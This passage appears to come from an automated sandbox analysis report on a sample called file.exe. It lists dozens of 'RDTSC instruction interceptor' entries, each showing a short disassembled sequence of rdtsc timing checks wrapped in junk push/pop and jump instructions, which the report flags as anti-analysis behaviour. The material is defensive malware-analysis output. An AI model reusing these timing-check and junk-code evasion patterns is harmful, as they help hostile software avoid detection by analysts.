              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3626F9 second address: 362722 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F80AC503246h 0x0000000a popad 0x0000000b push eax 0x0000000c jo 00007F80AC503246h 0x00000012 pop eax 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F80AC503250h 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 362722 second address: 362748 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jne 00007F80ACC66776h 0x0000000d jmp 00007F80ACC66788h 0x00000012 popad 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 362748 second address: 36276C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F80AC503259h 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 364D0E second address: 364D12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 364D12 second address: 364D42 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F80AC50324Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c jl 00007F80AC503246h 0x00000012 push eax 0x00000013 pop eax 0x00000014 push eax 0x00000015 pop eax 0x00000016 popad 0x00000017 jmp 00007F80AC50324Ch 0x0000001c push eax 0x0000001d push edx 0x0000001e push esi 0x0000001f pop esi 0x00000020 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 36A907 second address: 36A912 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edx 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 36A912 second address: 36A918 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 36A918 second address: 36A925 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 js 00007F80ACC6677Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 31F44C second address: 31F450 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 31F450 second address: 31F464 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F80ACC6677Ah 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 31F464 second address: 31F46B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 31F46B second address: 31F4B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ecx 0x0000000b call 00007F80ACC66778h 0x00000010 pop ecx 0x00000011 mov dword ptr [esp+04h], ecx 0x00000015 add dword ptr [esp+04h], 0000001Ch 0x0000001d inc ecx 0x0000001e push ecx 0x0000001f ret 0x00000020 pop ecx 0x00000021 ret 0x00000022 or di, 581Ch 0x00000027 pushad 0x00000028 xor dword ptr [ebp+1246202Fh], edx 0x0000002e sub eax, dword ptr [ebp+122D385Dh] 0x00000034 popad 0x00000035 push 00000004h 0x00000037 nop 0x00000038 jl 00007F80ACC6677Eh 0x0000003e push ebx 0x0000003f push eax 0x00000040 push edx 0x00000041 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 36ABDC second address: 36ABF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F80AC50324Eh 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 36EA75 second address: 36EA89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F80ACC66776h 0x0000000a popad 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e jno 00007F80ACC66776h 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 36EA89 second address: 36EA93 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F80AC503246h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 36EBDD second address: 36EBE3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2E24CC second address: 2E24F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 ja 00007F80AC503246h 0x0000000b jmp 00007F80AC503255h 0x00000010 push esi 0x00000011 pop esi 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 push edx 0x00000016 pop edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 371BA9 second address: 371BB5 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F80ACC66776h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 371BB5 second address: 371BD7 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F80AC50324Eh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 js 00007F80AC503246h 0x00000019 popad 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 371BD7 second address: 371BF9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F80ACC66788h 0x00000007 jl 00007F80ACC66782h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 371BF9 second address: 371BFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 378BFE second address: 378C02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 379368 second address: 37936C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 37936C second address: 37938D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b pop edx 0x0000000c jmp 00007F80ACC66785h 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 379647 second address: 37964F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 379BDB second address: 379BDF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 379BDF second address: 379BE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 37D851 second address: 37D855 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 37DB72 second address: 37DB8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F80AC50324Bh 0x0000000f jl 00007F80AC503246h 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 37DB8D second address: 37DB93 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 37DB93 second address: 37DBAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F80AC503254h 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 37DBAD second address: 37DBC1 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F80ACC66778h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e jc 00007F80ACC66776h 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 37DE80 second address: 37DE86 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 37DE86 second address: 37DE97 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 jmp 00007F80ACC6677Ah 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 37DE97 second address: 37DEA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 37E021 second address: 37E043 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F80ACC66776h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F80ACC66783h 0x0000000f pop ebx 0x00000010 push ecx 0x00000011 push edi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 37E193 second address: 37E198 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 382B3E second address: 382B56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F80ACC6677Bh 0x00000009 pushad 0x0000000a js 00007F80ACC66776h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 38ACDC second address: 38ACE7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 388FED second address: 388FF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 388FF3 second address: 389001 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 389001 second address: 38900E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 js 00007F80ACC66776h 0x0000000c pop edi 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3892D9 second address: 3892FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push esi 0x00000008 pop esi 0x00000009 push edi 0x0000000a pop edi 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f jmp 00007F80AC503253h 0x00000014 pop ecx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3892FC second address: 38930E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F80ACC6677Ch 0x00000009 push edx 0x0000000a pop edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 38949B second address: 3894A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3895F8 second address: 389616 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F80ACC66787h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 389616 second address: 38961E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 38961E second address: 389623 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3897B7 second address: 3897C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007F80AC503246h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 389C15 second address: 389C19 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 392675 second address: 39268F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F80AC503251h 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 39268F second address: 392693 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3923C3 second address: 3923C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3923C8 second address: 3923D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 ja 00007F80ACC66776h 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A0DF9 second address: 3A0E00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A0E00 second address: 3A0E30 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F80ACC66781h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F80ACC66786h 0x00000010 push ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A0E30 second address: 3A0E37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop ecx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A0E37 second address: 3A0E4D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F80ACC66782h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A0E4D second address: 3A0E51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A48CF second address: 3A48D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A48D5 second address: 3A48D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A48D9 second address: 3A48DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A48DD second address: 3A4905 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F80AC503250h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c ja 00007F80AC50324Eh 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A4905 second address: 3A4936 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jbe 00007F80ACC66791h 0x0000000b push edi 0x0000000c pop edi 0x0000000d jmp 00007F80ACC66789h 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 jo 00007F80ACC66776h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A44C3 second address: 3A44E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnl 00007F80AC503246h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F80AC50324Ch 0x00000013 jne 00007F80AC503246h 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2DD4E8 second address: 2DD4EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2DD4EE second address: 2DD4F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3B1693 second address: 3B16AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F80ACC66788h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3B16AF second address: 3B16B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3BA363 second address: 3BA395 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F80ACC66776h 0x0000000a jmp 00007F80ACC66785h 0x0000000f jmp 00007F80ACC66782h 0x00000014 popad 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3B8BE9 second address: 3B8BEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3B8BEF second address: 3B8BF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3B8EC1 second address: 3B8EC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3B8EC5 second address: 3B8ED0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007F80ACC66776h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3B8ED0 second address: 3B8EF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F80AC503254h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3B8EF2 second address: 3B8EF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3B8EF6 second address: 3B8F12 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F80AC50324Bh 0x0000000b pushad 0x0000000c push edi 0x0000000d pop edi 0x0000000e jno 00007F80AC503246h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3B9359 second address: 3B935F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2CB1AF second address: 2CB1B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2CB1B4 second address: 2CB1CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F80ACC66785h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2CB1CF second address: 2CB1D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2CB1D8 second address: 2CB1DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3BF0E5 second address: 3BF0EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3BF28A second address: 3BF290 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3CF9D3 second address: 3CF9D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3CF9D9 second address: 3CF9E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 pushad 0x00000007 push ebx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop ebx 0x0000000b pushad 0x0000000c push eax 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3DD7E9 second address: 3DD7EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3DD7EF second address: 3DD803 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F80ACC66776h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 push esi 0x00000011 push esi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3F31B7 second address: 3F31BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3F2137 second address: 3F2140 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3F2140 second address: 3F2144 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3F2144 second address: 3F2166 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F80ACC66776h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jmp 00007F80ACC66782h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3F2166 second address: 3F2177 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007F80AC50324Ah 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3F2177 second address: 3F217D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3F217D second address: 3F2181 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3F2545 second address: 3F2562 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F80ACC66783h 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3F2562 second address: 3F2568 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3F2568 second address: 3F256C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
